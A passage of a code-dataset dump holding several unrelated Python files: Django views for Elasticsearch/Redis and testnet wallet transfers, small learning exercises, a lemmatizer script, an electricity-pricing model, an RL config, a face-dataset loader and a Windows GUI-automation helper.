game_id = result['game_id']\n sport_id = result['sport_id']\n event_id = result['event_id']\n medal = result['medal']\n cursor.execute(\"insert into results(athlete_id, game_id, sport_id, event_id, medal) values(?, ?, ?, ?, ?)\",\n (athlete_id, game_id, sport_id, event_id, medal))\n\n conn.commit()\n conn.close()\n","repo_name":"stsh1119/olympic_games","sub_path":"populate_tables/insert_to_db.py","file_name":"insert_to_db.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10544545372","text":"from django.shortcuts import render,get_object_or_404\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom datetime import datetime\nfrom cloudboost.settings import es,rds\nfrom django.views.decorators.csrf import csrf_exempt\n# import json\n\n\n\ndef cloudboost(request):\n template = loader.get_template('elasticsearch_and_redis_app/index.html')\n context = {} \n \n return HttpResponse(\"Hello, world. This is home page\"+template.render(context, request))\n\n@csrf_exempt\ndef index(request):\n # book = get_object_or_404(Books)\n if request.method == 'GET':\n \tkey=request.GET['key']\n \tresult=rds.get(key) \n \treturn HttpResponse(result)\n elif request.method == 'POST':\n \tmessage = request.POST['message']\n \tres1 = es.index(index=\"test-index\", doc_type='cloudboost', body={\"message\": message, \"timestamp\": datetime.now()})\n \tres2=rds.set(\"message\",message)#since I had to index only one item, i.e. 
message, I only create a key message,\n \t\t\t\t\t\t\t\t# otherwise I would have used list in Redis \t\n \t# res1=json.dumps(res1, sort_keys=False, indent=4, separators=(',', ': '))\n \tresponse=\"\\n\\n\".join([str(res1),str(res2)])\n \t\n \t# template = loader.get_template('elasticsearch_and_redis_app/insert.html')\n \t# context={}\n \treturn HttpResponse(response)\n \t\n else:\n \treturn HttpResponse(\"GET/POST required\")\n\ndef search(request):\n\tres = es.search(index=\"test-index\", body={\"query\": {\"match\": {\"message\": request.GET['message']} }})\n\tret = []\n\tfor hit in res['hits'][\"hits\"]:\n\t\tret.append(hit['_source'])\n\treturn HttpResponse(str(ret)) \n\n","repo_name":"nirmitgoyal/CloudBoost","sub_path":"cloudboost/elasticsearch_and_redis_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22037817853","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import generics, permissions\nfrom .models import SenderWallet, ReceiverWallet, CreateTransaction\nfrom .serializers import SenderWalletCreateSerializer, SenderWalletRetrieveSerializer, ReceiverWalletSerializer, CreateTransactionSerializer\nimport requests\nimport json\nfrom django.core.cache import cache\n\n\nclass SenderWalletObject(generics.RetrieveDestroyAPIView):\n queryset = SenderWallet.objects.all()\n serializer_class = SenderWalletRetrieveSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def get_object(self):\n cache_key = f'sender_wallet_{self.kwargs[\"pk\"]}'\n sender_wallet = cache.get(cache_key)\n\n if not sender_wallet:\n sender_wallet = get_object_or_404(SenderWallet, pk=self.kwargs['pk'])\n cache.set(cache_key, sender_wallet)\n\n return sender_wallet\n\n\nclass SenderWalletList(generics.ListCreateAPIView):\n queryset = SenderWallet.objects.all()\n permission_classes = [permissions.IsAuthenticated]\n\n def get_serializer_class(self):\n if self.request.method == 'POST':\n return SenderWalletCreateSerializer\n else:\n return SenderWalletRetrieveSerializer\n\n def perform_create(self, serializer):\n serializer.save(creator=self.request.user)\n\n\nclass ReceiverWalletList(generics.ListCreateAPIView):\n queryset = ReceiverWallet.objects.all()\n serializer_class = ReceiverWalletSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def get_queryset(self):\n queryset = ReceiverWallet.objects.all()\n cache_key = 'receiver_wallets'\n\n receiver_wallets = cache.get(cache_key)\n if not receiver_wallets:\n receiver_wallets = list(queryset)\n cache.set(cache_key, receiver_wallets)\n\n return receiver_wallets\n\n\nclass ReceiverWalletObject(generics.RetrieveDestroyAPIView):\n queryset = ReceiverWallet.objects.all()\n serializer_class = ReceiverWalletSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def get_object(self):\n cache_key = f'receiver_wallet_{self.kwargs[\"pk\"]}'\n receiver_wallet = cache.get(cache_key)\n\n if not receiver_wallet:\n receiver_wallet = get_object_or_404(ReceiverWallet, pk=self.kwargs['pk'])\n cache.set(cache_key, receiver_wallet)\n\n return receiver_wallet\n\n\nclass CreateTransactionsList(generics.ListCreateAPIView):\n queryset = CreateTransaction.objects.all()\n serializer_class = CreateTransactionSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def perform_create(self, serializer):\n transaction_hash = 
self.get_response_from_transfer_request(serializer.validated_data)\n        serializer.save(transaction_hash=transaction_hash, transaction_link=\"https://explorer.theta-testnet.polypore.xyz/transactions/\"+transaction_hash)\n\n    def get_values(self, transaction):\n        sender_wallet = transaction['from_address']\n        receiver_wallet = transaction['to_address']\n\n        return {'from_address': sender_wallet.from_address,\n                \"seed\": sender_wallet.seed, \"to_address\": receiver_wallet.to_address, \"amount\": transaction['amount']}\n\n    def get_response_from_transfer_request(self, transaction):\n        response = self.get_values(transaction)\n        data = {\"from_address\": response[\"from_address\"], \"to_address\": response[\"to_address\"], \"seed\": response[\"seed\"], \"amount\": response[\"amount\"]}\n        headers = {'Content-Type': 'application/json'}\n        print(\"data\", data)\n        json_data = json.dumps(data)\n        response = requests.post('http://ts:3000/api/broadcast-transaction/', data=json_data, headers=headers)\n        if response.status_code == 201:\n            data = response.json()\n            return data['message']['transactionHash']\n        else:\n            print('API request failed with status code', response.status_code)\n\n\nclass CreateTransactionObject(generics.RetrieveDestroyAPIView):\n    queryset = CreateTransaction.objects.all()\n    serializer_class = CreateTransactionSerializer\n    permission_classes = [permissions.IsAuthenticated]\n\n\n","repo_name":"AminMortezaie/django-tutorial","sub_path":"ExchangeSystem/cosmos-app/transfer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"25551229627","text":"# we learned how to handle exceptions, now let's learn how to raise\n# exceptions\n\n\ndef cal_age(age):\n    if age <= 0:\n        raise ValueError(\"Age can't be zero\")\n    return 10/age\n\n\ntry:\n    cal_age(0)\nexcept ValueError:\n    print('Error')\n","repo_name":"aliahmadcse/Learning_Python","sub_path":"exceptions/raising_exceptions.py","file_name":"raising_exceptions.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40214666957","text":"# https://leetcode.com/problems/permutation-in-string/description/\nfrom collections import Counter, defaultdict\n\nclass Solution:\n    # time o(m*n), space = o(n*m) where m = len(s2), n=len(s1)\n    def checkInclusion_sliding_window(self, s1: str, s2: str) -> bool:\n        \"\"\"\n        method 1: sliding window:\n        \"\"\"\n        char_map_s1 = Counter(s1)\n        len_s1 = len(s1)\n        for i in range(0, len(s2)-len_s1+1):\n            char_map_window = Counter(s2[i:i+len_s1])\n            if char_map_window == char_map_s1:\n                return True\n        return False\n\n    @staticmethod\n    def _counter(s:str) -> dict:\n        char_map = defaultdict(int)\n        for i in s:\n            char_map[i] += 1\n        return char_map\n\n    # time o(m*n), space = o(26*2) where m = len(s2), n=len(s1)\n    def checkInclusion_sliding_window_optimize_1(self, s1: str, s2: str) -> bool:\n        \"\"\"\n        method 2: sliding window optimized_1\n        # todo: Do not use Counter() logic multiple times.\n        \"\"\"\n        len_s1 = len(s1)\n        len_s2 = len(s2)\n\n        # base case\n        if len_s1 > len_s2:\n            return False\n\n        char_map_s1 = self._counter(s1)\n        char_map_s2 = self._counter(s2[:len_s1])\n\n        # linear time loop with window\n        for j in range(len_s1, len_s2):\n            # step 1: compare current window\n            # to-do: you can avoid this and do it in constant time\n            if char_map_s2 == char_map_s1:\n                return True\n\n            # step 2: add last_char in char_map\n            last_char = s2[j]\n            char_map_s2[last_char] += 1\n\n            # step 3: decrement/remove first_char in char_map\n            first_char = s2[j-len_s1]\n            char_map_s2[first_char] -= 1\n            if char_map_s2[first_char] < 1:\n                del char_map_s2[first_char]\n\n        return char_map_s2 == char_map_s1\n\n    # time o(m-n), space = o(min(26, n)) where m = len(s2), n=len(s1)\n    def checkInclusion_sliding_window_optimize_2(self, s1: str, s2: str) -> bool:\n        \"\"\"\n        method 3: sliding window optimized_2\n        \"\"\"\n        len_s1 = len(s1)\n        len_s2 = len(s2)\n\n        # base case\n        if len_s1 > len_s2:\n            return False\n\n        # calculate first window counter_maps\n        char_map_s2 = {}\n        char_map_s1 = {}\n        for i in range(len_s1):\n            char_map_s1[s1[i]] = char_map_s1.get(s1[i], 0) + 1\n            char_map_s2[s2[i]] = char_map_s2.get(s2[i], 0) + 1\n\n        # check how many items match in first window\n        matches=0\n        for char, count in char_map_s1.items():\n            matches += min(count, char_map_s2.get(char, 0))\n\n        # scroll window till the last.\n        for j in range(len_s1, len_s2):\n            # base condition: check if all chars match in s2\n            if matches == len_s1:\n                return True\n\n            last_char = s2[j]  # add this char to window\n            first_char = s2[j-len_s1]  # remove this char from window\n\n            # step 1: add last_char in char_map\n            char_map_s2[last_char] = char_map_s2.get(last_char, 0) + 1\n\n            # adjust matches_counter for new char\n            if char_map_s1.get(last_char) and char_map_s2[last_char] <= char_map_s1[last_char]:\n                matches += 1\n            # adjust matches_counter for removed char\n            if char_map_s1.get(first_char) and char_map_s1[first_char] >= char_map_s2[first_char]:\n                matches -= 1\n\n            # step 3: decrement/remove first_char in char_map\n            char_map_s2[first_char] -= 1\n            if char_map_s2[first_char] < 1:\n                del char_map_s2[first_char]\n\n        return matches == len_s1","repo_name":"vKrypto/practice-dsa","sub_path":"problems/permutation-in-string.py","file_name":"permutation-in-string.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1120939999","text":"def attempts(n):\n    x = 1  # x counts the attempts, starting at 1\n    while x <= n:\n        print(f\"attempt no: {str(x)}\")\n        x += 1\n    print(\"done\")\n\ndef count_down(start_count):\n    current = start_count\n    while current >= 0:\n        print(current)\n        current += -1\n    print(\"done\")\n\n\ndef is_power_of_two(n):\n    # Check if the number can be divided by two without a remainder\n    while n % 2 == 0:\n        n = n / 2\n        if n == 0:\n            return False\n    # If after dividing by two the number is 1, it's a power of two\n    if n == 1:\n        return True\n    return False\n\n\n\ndef decade_counter(year):\n\twhile year < 50:\n\t\tyear += 10\n\treturn year\n\n\n\n","repo_name":"Uzair-A-Jokhio/Python-language","sub_path":"Python_Scrpits/Basics/while loops.py","file_name":"while loops.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"20426986670","text":"import json\n\nfrom argparse import ArgumentParser\nfrom os.path import isfile\n\nfrom derek import transformer_from_props\nfrom derek.data.model import Document, Sentence, Paragraph\n\n\ndef build_argparser():\n    parser = ArgumentParser(description=\"Lemmatize gazetteer file\")\n    parser.add_argument('-input', type=str, dest='input_path', metavar='',\n                        required=True, help='path to input gazetteer file to lemmatize')\n    parser.add_argument('-transformer_props', type=str, dest='transformer_props', metavar='',\n                        required=True, help='path to transformer props')\n    parser.add_argument('-output', 
type=str, dest='output_path', metavar='',\n required=True, help='path to save lemmatized gazetteer')\n return parser\n\n\ndef _get_lemma(token, transformer):\n doc = Document(\"\", [token], [Sentence(0, 1)], [Paragraph(0, 1)])\n featured_doc = transformer.transform(doc)\n return featured_doc.token_features['lemmas'][0]\n\n\ndef lemmatize(input_path, output_path, transformers_props_path):\n with open(transformers_props_path, 'r', encoding='utf-8') as f, \\\n transformer_from_props(json.load(f)) as transformer, \\\n open(input_path, 'r', encoding='utf-8') as readfile, \\\n open(output_path, 'w', encoding='utf-8', newline='\\n') as outfile:\n for line in readfile:\n lemma = _get_lemma(line.strip(), transformer)\n outfile.write(lemma + \"\\n\")\n\n\ndef main():\n parser = build_argparser()\n args = parser.parse_args()\n input_path = args.input_path\n out_path = args.output_path\n transformers_props_path = args.transformer_props\n if isfile(input_path):\n lemmatize(input_path, out_path, transformers_props_path)\n else:\n raise FileNotFoundError()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ispras-texterra/derek","sub_path":"tools/gazetteer_lemmatizer.py","file_name":"gazetteer_lemmatizer.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"43236053503","text":"from lmpnz.GuillaumeExample import price_making_algorithm\nfrom lmpnz.GuillaumeExample import economic_dispatch\nfrom lmpnz.GuillaumeExample import price_taking_algorithm\nimport imp\nimp.reload(economic_dispatch)\nimp.reload(price_taking_algorithm)\nimport json\nimport math\nimport numpy as np\nimport pandas as pd\nimport pyomo.environ as pyo\nimport lmpnz.Network.PriceBids.Load.Load as ld\nimport stored_path\nfrom lmpnz.GuillaumeExample import LMP\nfrom lmpnz.Network.PriceBids.Generator.Generator import Generator\nfrom lmpnz.Network.PriceBids.Load.Load import Load\nfrom lmpnz.Network.Topology.Topology import Topology as top\nimport matplotlib.pyplot as plt\n\n\ndef tweak_d(d, load_factor = 1.3, index_to_tweak = 10, load_factor_for_node=12.1):\n save = d[index_to_tweak].copy()\n save_d = d.copy()\n d[index_to_tweak] = save\n d = load_factor * save_d.copy()\n d[index_to_tweak] = save * load_factor_for_node\n return d\n\n\ndef add_loads_to_topology(AMB_network):\n Existing_sub_nodes = ld.get_existing_subnodes()\n historical_loads = ld.get_historical_loads()\n Simp_nodes_dict = ld.get_nodes_to_subnodes()\n Simp_nodes_dict[\"MAN\"] = [\"MAN2201\"]\n Existing_sub_nodes.append(\"MAN2201\")\n nodes_to_index = pd.read_csv(stored_path.main_path + '/data/ABM/ABM_Nodes.csv')\n for i, node in enumerate(AMB_network.names_2_nodes.keys()):\n # print(\"Load added at node : \" + node)\n index = nodes_to_index[nodes_to_index[\"Node names\"] == node][\"Node index\"].values[0]\n load = Load(node, node, index, type=\"real_load\")\n load.add_load_data(historical_loads, Simp_nodes_dict, Existing_sub_nodes)\n AMB_network.add_load(load)\n return AMB_network\n\ndef add_generators_to_topology(AMB_network):\n file_path = stored_path.main_path + '/data/generators/generator_adjacency_matrix_dict1.json'\n with open(file_path) as f:\n data = json.loads(f.read())\n\n number_of_added_generators = 0\n for name_generator in data.keys():\n L_ = data[name_generator]\n try:\n if type(L_[0]) != float:\n if not math.isnan(L_[-2]):\n if L_[-1] == 'Hydro':\n P_min = L_[-2]\n else:\n P_min = 0\n\n g = Generator(name_generator, L_[0], 0, L_[-1], Pmax=L_[-2], 
Pmin=P_min,\n marginal_cost=np.array(L_[1]))\n AMB_network.add_generator(g)\n number_of_added_generators += 1\n except:\n pass\n\n return AMB_network\n\n\ndef get_load_matrix(AMB_network, day, Horizon_T):\n d = []\n for k, node in enumerate(AMB_network.loads.keys()):\n d.append([])\n for j in range(day * 48, day * 48 + Horizon_T):\n d[k].append(1 * 1000 * AMB_network.loads[node][0].return_d(1 + j // 48, j % 48 + 1))\n d = np.array(d)\n return d\n\n\ndef get_producers_matrices(AMB_network, day, Horizon_T):\n n_generator = AMB_network.get_number_of_gen()\n b = np.zeros((n_generator, Horizon_T))\n P_max = np.zeros((n_generator, Horizon_T))\n P_min = np.zeros((n_generator, Horizon_T))\n for node in AMB_network.generators.keys():\n for g in AMB_network.generators[node]:\n for i, j in enumerate(range(day * (48-1), day * (48-1) + Horizon_T)):\n if g.name == \"diesel_gen\":\n pmax, pmin, a = 500, 0, 100\n else:\n pmax, pmin, a = LMP.get_P_min_a(g.name, 1 + j // 48, j % 48 + 1, g.type)\n P_max[g.index, i] = pmax\n P_min[g.index, i] = pmin if g.type == \"Hydro\" else 0\n b[g.index, i] = a if a > 0 else np.random.randint(0, 50)\n return b, P_max, P_min\n\n\ndef get_basics(Horizon_T, day):\n AMB_network = top(network=\"ABM\")\n AMB_network = add_loads_to_topology(AMB_network)\n AMB_network = add_generators_to_topology(AMB_network)\n H, h = AMB_network.H, AMB_network.h\n print(\"Topology loaded\")\n \"\"\"\n Tweak case : add a fake generator\n \"\"\"\n node_name = \"MDN\"\n AMB_network.add_generator(Generator(\"diesel_gen\", node_name, 0, 0, Pmax=200, Pmin=0,\n marginal_cost=[0, 0]))\n\n \"\"\"\n Get the load data\n \"\"\"\n d = get_load_matrix(AMB_network, day, Horizon_T)\n d = tweak_d(d, load_factor = 1.3, index_to_tweak = 10, load_factor_for_node=12.1)\n # d = tweak_d(d, load_factor=1, index_to_tweak=10, load_factor_for_node=1)\n print(\"Load historical data loaded and tweaked\")\n\n \"\"\"\n Get the bid matrices\n \"\"\"\n b, P_max, P_min = get_producers_matrices(AMB_network, day, Horizon_T)\n print(\"Load historical bids\")\n\n \"\"\"\n Load now the topology of generators\n \"\"\"\n Mn = AMB_network.Mn\n return H, h, Mn, b, P_max, P_min, d\n\n\ndef baseline_prices():\n Horizon_T, day = 48, 2\n H, h, Mn, b, P_max, P_min, d = get_basics(Horizon_T, day)\n n = d.shape[0] # number of nodes\n\n \"\"\"\n Find lambdas for the day (they will be deemed exogenous)\n \"\"\"\n lambdas = np.zeros((n, Horizon_T))\n gammas = np.zeros(Horizon_T)\n for j in range(Horizon_T):\n \"\"\"\n Here is a new optimization framework which is rigoursely the same as devised in the algorithm, \n WARNING this is just for time period j.\n\n We input the c and q, the price and quantity offered by the battery. 
Here 0,0 because we want the LMPs\n without the battery\n \"\"\"\n c = 0\n q = 0\n model = economic_dispatch.run_ED_1period(d[:, j], b[:, j], P_max[:, j], P_min[:, j], c, q, H, h, Mn)\n for k in range(n):\n lambdas[k, j] = model.dual[model.injection_definition[k]] # here we store the dual variables of the injection definition constraint\n\n gammas[j] = model.dual[model.injection_balance]\n\n import matplotlib.pyplot as plt\n fig, axs = plt.subplots(2, sharex=True, figsize=(15, 10), dpi=80, facecolor='w', edgecolor='k')\n plt.subplots_adjust(hspace=.0)\n fs = 20\n\n # if Node is not None:\n # Node_name = Nodes[Node]\n # Nodes = [None] * len(Nodes)\n # Nodes[Node] = Node_name\n # Y = np.array(LMP_df[[f'{i}' for i in range(t)]][1:]).T - np.array([gamma_df.gamma[:t].tolist()]).T\n # else:\n # Y = np.array(LMP_df[[f'{i}' for i in range(t)]][1:]).T - np.array([gamma_df.gamma[:t].tolist()]).T\n\n axs[0].plot(gammas)\n axs[0].set_ylabel('Average price $\\gamma$ [\\$/MW]', fontsize=fs)\n axs[0].set_ylim(bottom=0)\n axs[0].set_title('Average price and congestion curves\\n Baseline model, Sept. 2nd, 2019', fontsize=fs)\n axs[0].grid()\n\n for i in range(1, 20):\n axs[1].plot(lambdas[i]-gammas, label=f'{i}')\n # for i, y_arr, label in zip(range(1, 20), Y[1:, :], Nodes[1:].tolist()):\n # if (label == 'MDN') | (label == 'HEN'):\n # axs[1].plot(y_arr, label=f'{i} : {label}', linewidth=5)\n # else:\n # axs[1].plot(y_arr, label=f'{i} : {label}')\n\n axs[1].legend()\n axs[1].set_ylabel('$\\lambda - \\gamma$ [\\$/MW]', fontsize=fs)\n axs[1].set_xlabel('Time [h]', fontsize=fs)\n plt.xticks(range(0, 48, 2), range(24))\n axs[1].set_xlim([0, 48])\n axs[1].grid()\n plt.show()","repo_name":"GuillaumeGoujard/LMP_NZ","sub_path":"archive/article_example/PMker_26September.py","file_name":"PMker_26September.py","file_ext":"py","file_size_in_byte":7179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17297978610","text":"# Global variables for the program\nimport numpy as np\nimport math\n\n\nclass Config:\n # tuning parameters\n n_jobs = 1 # number of simultaneous threads !!always less than processor has!!!\n flag_train_all = True\n\n steps_vi = 200 # steps for value iteration\n\n # environment\n env_max_iterations = 50\n\n # Q learning\n epochs_ql = 100 # number of epochs for q_learning\n alpha_ql = 0.002 # learning rate\n epsilon_ql = 1 # initial value of epsilon\n epsilon_min_ql = 0.1\n epsilon_decay_ql = 0.9995 # epsilon decay each iteration\n\n # DQN\n flag_train_dqn = True\n episodes_dqn = 2 # number of episodes\n n_seeds = 2\n train_wait = 30 # train_wait = 10 # number of steps it waits to train the model\n learning_rate_dqn = 0.0001\n epsilon_decay_dqn = 0.999\n dqn_evaluate_reps = 2 # times the dqn model is evaluated to average the score afterwards\n\n # Evaluate policies\n rep_eval_pol = 3\n\n # DRQN\n trace_length = 5 # Temporal dimension: length of sequence to feed the neural network\n episodes_drqn = episodes_dqn\n drqn_evaluate_reps = dqn_evaluate_reps\n\n # original states\n N_states = 2\n N_actions = 2\n states = np.array([0, 1])\n actions = np.array([0, 1])\n\n def __init__(self):\n self.gamma = 0.99 # discount factor\n self.L = 2 # length of the frame\n self.lambda_on = 6\n self.lambda_off = 3\n self.ts = 0.1 # period of sample\n\n # reward\n self.rnt = -.5 # no transmission reward when the primary is not transmitting\n self.rt = 1 # transmitting when primary not transmitting\n self.rp = .5 # not transmitting when primary transmitting\n 
self.rc = -1.5 # transmitting when primary transmitting -> collision\n\n self.update()\n\n def update(self):\n # update the transition and rewards matrix\n self.exponent = math.exp(- (self.lambda_on + self.lambda_off) * self.ts)\n self.p00 = self.lambda_on / (self.lambda_on + self.lambda_off) + self.lambda_off / (\n self.lambda_on + self.lambda_off) * self.exponent\n self.p01 = 1 - self.p00\n self.p11 = self.lambda_off / (self.lambda_on + self.lambda_off) + self.lambda_on / (\n self.lambda_on + self.lambda_off) * self.exponent\n self.p10 = 1 - self.p11\n\n self.P = np.array([[self.p00, self.p01],\n [self.p00 ** (self.L + 1), (1 - self.p00 ** (self.L + 1))],\n [self.p10, self.p11],\n [self.p10 * self.p00 ** self.L, (1 - self.p10 * self.p00 ** self.L)]])\n\n self.R = np.array(\n [self.rnt * self.p00 + self.rp * self.p01,\n self.rt * self.p00 ** (self.L + 1) + self.rc * (1 - self.p00 ** (self.L + 1)),\n self.rp * self.p11 + self.rnt * self.p10,\n self.rc * (1 - self.p10 * self.p00 ** self.L) + self.rt * self.p10 * self.p00 ** self.L])\n self.instant_reward = np.array([[self.rnt, self.rp], # r(0,0,0) r(0,0,1) # this is the reward of r(s,a,s')\n [self.rt, self.rc], # r(0,1,0) r(0,1,1)\n [self.rnt, self.rp], # r(1,0,0) r(1,0,1)\n [self.rt, self.rc]]) # r(1,1,0) r(1,1,1)","repo_name":"DavidMaister/tfm_rl","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"22279062431","text":"#!/usr/bin/env python\n\nimport collections\nimport os\n\nimport numpy as np\nimport PIL.Image\nimport scipy.io\nimport torch\nfrom torch.utils import data\nimport torchvision.transforms\nfrom torchvision.datasets.folder import default_loader\n\n\nclass VGG_Faces2(data.Dataset):\n\n mean_bgr = np.array([91.4953, 103.8827, 131.0912]) # from resnet50_ft.prototxt\n\n def __init__(self, root, train, transform=None):\n \"\"\"\n :param root: dataset directory\n :param image_list_file: contains image file names under root\n :param id_label_dict: X[class_id] -> label\n :param split: train or valid\n :param transform:\n :param horizontal_flip:\n :param upper: max number of image used for debug\n \"\"\"\n self.root = root\n\n if train:\n self.file_list = torch.load(self.root + '/train_list.pt')\n else:\n self.file_list = torch.load(self.root + '/test_list.pt')\n self.bboxes = torch.load(self.root + '/bboxes.pt')\n\n self.transform = transform\n self.loader = default_loader\n\n # self.img_info = []\n # with open(self.image_list_file, 'r') as f:\n # for i, img_file in enumerate(f):\n # img_file = img_file.strip() # e.g. 
train/n004332/0317_01.jpg\n # class_id = img_file.split(\"/\")[1] # like n004332\n # label = self.id_label_dict[class_id]\n # self.img_info.append({\n # 'cid': class_id,\n # 'img': img_file,\n # 'lbl': label,\n # })\n # if i % 1000 == 0:\n # print(\"processing: {} images for {}\".format(i, self.split))\n # if upper and i == upper - 1: # for debug purpose\n # break\n\n def __len__(self):\n return len(self.file_list)\n\n def __getitem__(self, index):\n img_file, label, bbox_id = self.file_list[index]\n bbox = self.bboxes[bbox_id]\n sample = self.loader(f'{self.root}/{img_file}')\n target = torch.tensor(label)\n x, y, w, h = bbox\n\n sample = sample.crop((x,y, x+w, y+h))\n\n if self.transform:\n sample = self.transform(sample)\n\n return sample, target\n\n def transform(self, img):\n img = img[:, :, ::-1] # RGB -> BGR\n img = img.astype(np.float32)\n img -= self.mean_bgr\n img = img.transpose(2, 0, 1) # C x H x W\n img = torch.from_numpy(img).float()\n return img\n\n def untransform(self, img, lbl):\n img = img.numpy()\n img = img.transpose(1, 2, 0)\n img += self.mean_bgr\n img = img.astype(np.uint8)\n img = img[:, :, ::-1]\n return img, lbl","repo_name":"ebagdasa/backdoors101","sub_path":"dataset/vggface.py","file_name":"vggface.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":289,"dataset":"github-code","pt":"40"} +{"seq_id":"37688256686","text":"import sys\n\nimport aircv as ac\nimport cv2\nfrom PIL import ImageGrab\nimport time\nimport numpy as np\nimport xlrd\nimport pyautogui\nimport requests\nimport json\nfrom lib.pic import *\nfrom pywinauto.base_wrapper import BaseWrapper\nfrom pywinauto import application\nimport os\n\ndef log(content):\n currentTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n date = time.strftime(\"%Y_%m_%d\")\n with open(\"../log/{}.log\".format(date),\"a+\",encoding=\"utf-8\") as f:\n # f.write(currentTime + \" \" + content + \"\\n\")\n f.write(\"{} {}\\n\".format(currentTime,content))\n\ndef dragwindow(appwindow, pic=ihomeicon):\n \"\"\"\n :type appwindow: BaseWrapper\n :param pic:str\n :return:\n \"\"\"\n saveimage(appwindow)\n result = matchimg(picturename, pic)\n if result:\n appwindow.click_input(coords=floattoint(result.get(\"result\")))\n pyautogui.mouseDown()\n pyautogui.dragRel(-100, -100, duration=0.25)\n pyautogui.mouseUp()\n\n\ndef findwindow(app, titlename=\"艾佳生活\", timeout=180):\n \"\"\"\n :type app:application.Application\n :param titlename: str\n :param timeout:int\n :rtype: BaseWrapper\n \"\"\"\n while True:\n if timeout > 0:\n try:\n App = app.connect(title=titlename)\n print(\"find window :\" + titlename)\n App[titlename].set_focus()\n return App[titlename]\n except:\n time.sleep(1)\n timeout = timeout - 1\n else:\n print(\"timeout to find window\")\n sys.exit()\n\n\ndef matchimgall(imgsrc, imgobj, confidence=0.85): # imgsrc=原始图像,imgobj=待查找的图片\n \"\"\"\n :param imgsrc:\n :param imgobj:\n :param confidence:\n :rtype:dict\n :return:\n\n Args:\n imgsrc(string): 图像、素材\n imgobj(string): 需要查找的图片\n confidence: 阈值,当相识度小于该阈值的时候,就忽略掉\n\n Returns:\n A tuple of found [(point, score), ...]\n \"\"\"\n\n confidence = getattr(matchimg, \"confidence\", confidence)\n imsrc = cv2.imdecode(np.fromfile(imgsrc, dtype=np.uint8), cv2.IMREAD_UNCHANGED)\n imobj = cv2.imdecode(np.fromfile(imgobj, dtype=np.uint8), cv2.IMREAD_UNCHANGED)\n\n match_result = ac.find_all_template(imsrc, imobj, confidence)\n # if match_result is not None:\n # match_result['shape'] = (imsrc.shape[1], imsrc.shape[0]) # 
获取原始图片宽高 0为高,1为宽\n print(imgsrc, imgobj, match_result)\n return match_result\n\n\ndef matchimg(imgsrc, imgobj, confidence=0.85): # imgsrc=原始图像,imgobj=待查找的图片\n \"\"\"\n :param imgsrc:\n :param imgobj:\n :param confidence:\n :rtype:dict\n :return:\n\n Args:\n imgsrc(string): 图像、素材\n imgobj(string): 需要查找的图片\n confidence: 阈值,当相识度小于该阈值的时候,就忽略掉\n\n Returns:\n A tuple of found [(point, score), ...]\n \"\"\"\n confidence = getattr(matchimg, \"confidence\", confidence)\n imsrc = cv2.imdecode(np.fromfile(imgsrc, dtype=np.uint8), cv2.IMREAD_UNCHANGED)\n imobj = cv2.imdecode(np.fromfile(imgobj, dtype=np.uint8), cv2.IMREAD_UNCHANGED)\n\n match_result = ac.find_template(imsrc, imobj, confidence)\n # if match_result is not None:\n # match_result['shape'] = (imsrc.shape[1], imsrc.shape[0]) # 获取原始图片宽高 0为高,1为宽\n print(imgsrc, imgobj, match_result)\n # log(\"{} {} {}\".format(imgsrc, imgobj, match_result))\n return match_result\n\n\ndef floattoint(changeobject, xoffset=0, yoffset=0):\n \"\"\"\n :type changeobject: tuple\n :param xoffset: 根据当前坐标x平移xoffset\n :param yoffset: 根据当前左边y平移yoffset\n :return:把浮点型左边转换成整形坐标\n :rtype:tuple\n \"\"\"\n # intx 横向坐标偏移量\n # inty 纵向坐标偏移量\n if isinstance(changeobject, tuple):\n a = int(changeobject[0]) + xoffset\n b = int(changeobject[1]) + yoffset\n resultobject = (a, b)\n return resultobject\n\n\ndef saveimage(appwindow, fullscreenpic=picturename):\n \"\"\"\n :type appwindow: BaseWrapper\n :param fullscreenpic: 保存的图片路径和名字\n :return:\n \"\"\"\n print(appwindow.rectangle()) # 获取应用图形矩阵\n\n left = appwindow.rectangle().left\n right = appwindow.rectangle().right\n top = appwindow.rectangle().top\n bottom = appwindow.rectangle().bottom\n\n bbox = (left, top, right, bottom) # 图形矩阵\n img = ImageGrab.grab(bbox)\n img.save(fullscreenpic)\n # img.show()\n\ndef savePic(appwindow,info):\n \"\"\"\n :type appwindow: BaseWrapper\n :return:\n \"\"\"\n\n print(appwindow.rectangle()) # 获取应用图形矩阵\n\n left = appwindow.rectangle().left\n right = appwindow.rectangle().right\n top = appwindow.rectangle().top\n bottom = appwindow.rectangle().bottom\n\n bbox = (left, top, right, bottom) # 图形矩阵\n img = ImageGrab.grab(bbox)\n\n date = time.strftime(\"%Y_%m_%d\")\n if not 